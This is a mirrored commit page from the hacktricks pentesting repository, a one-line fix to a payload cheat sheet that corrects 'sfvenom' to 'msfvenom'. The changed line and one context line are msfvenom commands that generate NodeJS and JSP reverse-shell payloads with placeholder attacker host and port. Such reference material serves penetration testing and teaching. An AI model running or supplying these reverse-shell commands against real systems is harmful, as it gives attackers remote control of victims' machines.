mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 22:20:43 +00:00
Fix NodeJS reverse shell
This commit is contained in:
parent
129cdd6480
commit
e9e67d265f
1 changed files with 1 additions and 1 deletions
|
@ -157,7 +157,7 @@ msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f w
|
||||||
## NodeJS
|
## NodeJS
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
sfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
|
msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
|
||||||
```
|
```
|
||||||
|
|
||||||
# **Script Language payloads**
|
# **Script Language payloads**
|
||||||
|
|
Loading…
Reference in a new issue